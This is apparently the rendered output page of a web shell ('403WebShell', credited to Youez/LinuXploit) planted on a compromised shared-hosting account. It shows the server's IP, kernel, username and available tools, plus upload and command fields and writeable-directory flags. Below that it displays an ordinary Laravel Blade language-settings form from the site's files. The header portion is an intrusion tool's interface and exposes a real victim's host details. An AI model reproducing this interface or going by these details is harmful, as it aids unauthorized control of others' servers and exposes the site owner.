Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.144.248.150
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/book24.ng/modules/Language/Views/admin/language/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/book24.ng/modules/Language/Views/admin/language/form.blade.php
<div class="form-group">
    <label>{{__("Locale")}}</label>
    <div>
        <select name="locale" class="form-control dungdt-select2-field dungdt_input_locale" data-options='{"allowClear":true}' data-id="{{$row->id}}">
            <option value="">{{__("-- Please select --")}}</option>
            @foreach($locales as $locale => $name)
                <option data-name="{{$name}}" @if($row->locale == $locale) selected @endif value="{{$locale}}">{{$name}} - ({{$locale}})</option>
            @endforeach
        </select>
    </div>
</div>
<div class="form-group">
    <label>{{__("Flag Icon")}}</label>
    <div class="input-group mb-3">
        <input type="text" value="{{$row->flag}}" placeholder="{{__("Eg: gb")}}" name="flag" class="form-control dungdt-input-flag-icon" required>
        <div class="input-group-append">
            <span class="input-group-text"><span class="flag-icon  flag-icon-{{$row->flag}}"></span></span>
        </div>

        <div class="invalid-feedback">
            {{__('Please input flag code')}}
        </div>
    </div>
</div>
<div class="form-group">
    <label>{{__("Name")}}</label>
    <input type="text" value="{{$row->name}}" placeholder="{{__("Display Name")}}" name="name" class="form-control" required>
    <div class="invalid-feedback">
        {{__('Please input language name')}}
    </div>
</div>
<div class="form-group">
    <label>{{__("Status")}}</label>
    <div class="">
        <label>
            <input type="radio" @if(!$row->status or $row->status == 'publish') checked @endif name="status" value="publish"> {{__('Publish')}}
        </label>
    </div>
    <div>
        <label>
            <input type="radio" @if($row->status == 'draft') checked @endif name="status" value="draft"> {{__('Draft')}}
        </label>
    </div>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit